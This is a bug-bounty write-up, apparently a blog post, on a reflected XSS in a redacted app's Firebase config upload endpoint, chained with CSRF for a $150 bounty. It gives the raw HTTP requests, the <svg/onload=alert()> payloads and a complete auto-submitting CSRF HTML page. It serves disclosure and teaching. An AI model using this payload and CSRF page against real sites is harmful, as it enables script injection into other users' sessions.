Dollars and Detectives: An Unique way to XSS Mysteries ( Not a Simp one ) for a $150 Reward

Nauman Khan
4 min readDec 11, 2023

--

بسم الله الرحمن الرحيم

Introduction:

Greetings cybersecurity enthusiasts! I’m Nauman Khan, and I’m thrilled to have you join me on yet another thrilling journey through the dynamic world of digital security. In our last encounter, we dived deep into the detection methods of SQL injection, uncovering potential vulnerabilities within web applications. If you missed that adventure, you can catch up on the SQL injection on an AI website

Today, our exploration continues with a focus on Cross-Site Scripting (XSS), where an enticing $150 bounty awaits the savvy explorer. Together, we’ll unravel the mysteries of XSS, understand its implications, and perhaps claim that enticing reward.

But before we dive in, let’s connect! Join me on LinkedIn , where we can foster a community of cybersecurity enthusiasts, share knowledge, and embark on these exciting digital quests together. So, fasten your seatbelts, and let’s navigate the ever-evolving landscape of cybersecurity — one blog at a time. Happy reading and happy connecting!

The Discovery:

In our digital adventure, we stumbled upon a function while testing . The application is about creating an mobile app using AI and it wants us to upload a firebase config file which contains some json.

Specifically, we found an interesting behavior during the upload of JSON file using this Firebase Config Upload feature.

The Beahviour:

The App Sends a POST request with multipart/form-data .

POST /api/firebase-config-upload HTTP/1.1
Host: redacted.com
Cookie: [Your_Cookies_Here]
Content-Type: multipart/form-data; boundary=---------------------------[BOUNDARY]

-----------------------------[BOUNDARY]
Content-Disposition: form-data; name="data"

{"anydatahere":"anyvaluehere"}
-----------------------------[BOUNDARY]
Content-Disposition: form-data; name="appId"

123456
-----------------------------[BOUNDARY]
Content-Disposition: form-data; name="filetype"

json
-----------------------------[BOUNDARY]--

So as you can see that there are three parameters data , appId and filetype . The data param has the json file we are uploading , appId is the ID of app we are working on and filetype has a value json.

And it gives a response something like this.

HTTP/1.1 200 OK
Server: [Server]
Content-Type: text/htlm
Content-Length: [Length]
Connection: keep-alive
[Additional-Headers-Here]

{
"status": "success",
"message": "Upload successful!",
"appId": "123456"
}

Analyzing the Quirk:

Upon a more detailed examination, we identified two primary anomalies. First, the server returned the user-supplied appId parameter without proper sanitization, potentially exposing the application to Cross-Site Scripting (XSS) attacks. Second, the Content-Type header in the server response was mistakenously set to text/html instead of the more appropriate application/json. (go up and check again)

Replicating the Vulnerability:

  1. Start by logging into your Redacted account and navigating to the app settings.
  2. Within the app settings, find and explore the “Advance Settings” section.
  3. In this section there is a feature to upload firebase config file.
  4. Use tools like Burpsuite to catch the multipart form request during the Firebase Config Upload. Identify the key components: data, appId, and fileType.
  5. Craft a manipulated JSON payload within the appId section. This is where we introduced a potential issue – <svg/onload=alert()>.
  6. Simulate the upload of a JSON file to see the vulnerability in action.
  7. Check the server response to ensure that the appId field reflects without proper validation.
HTTP/1.1 200 OK
Server: [Server]
Content-Type: text/html
Content-Length: [Length]
Connection: keep-alive
[Additional-Headers-Here]

{
"status": "success",
"message": "Upload successful!",
"appId": "<svg/onload=alert(document.domain)>"
}

Because of the Content-Type is set text/html the browser triggers the XSS.

CSRF Exploitation:

  1. Now The problem is to send multipart/form data as a Cross Site Request
  2. Use Burp Pro’s CSRF PoC generator to adapt the request for easier exploitation.
  3. Change the request method to send the data using application/x-www-form-urlencoded method.
  4. Then The request would look like this
POST /api/firebase-config-upload HTTP/1.1
Host: redacted.com
Cookie: [Your_Cookies_Here]
Content-Length:
Content-Type: application/x-www-form-urlencoded

data=%7B%22data%22%3A%22value%22%7D&appId=%3Csvg%2Fonload%3Dalert()%3E&filetype=json

5. And The response triggers the XSS as expected

The CSRF Exploit Code:

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF Trigger</title>
</head>
<body>

<form id="csrf-form" action="https://redacted.com/api/firebase-config-upload" method="POST">
<input type="hidden" name="data" value='{"data":"value"}'>
<input type="hidden" name="appId" value='<svg/onload=alert()>'>
<input type="hidden" name="filetype" value="json">
<input type="submit" value="Trigger CSRF">
</form>

<script>
// Automatically submit the form when the page loads
document.getElementById('csrf-form').submit();
</script>

</body>
</html>

Conclusion:

After long months of awaitness and some Heated talks , Got a mail one day which presents me with the bounty 150 $ And put the severity to Medium (P3).

In this beginner-friendly exploration, we’ve uncovered a vulnerability in Redacted’s Firebase Config Upload. Understanding these steps empowers us to contribute to a more secure digital environment. Keep learning, stay curious, and happy coding!

--

--

Nauman Khan
Nauman Khan

Written by Nauman Khan

Security Researcher | Bug Hunt3er | Junior Penetration Tester

No responses yet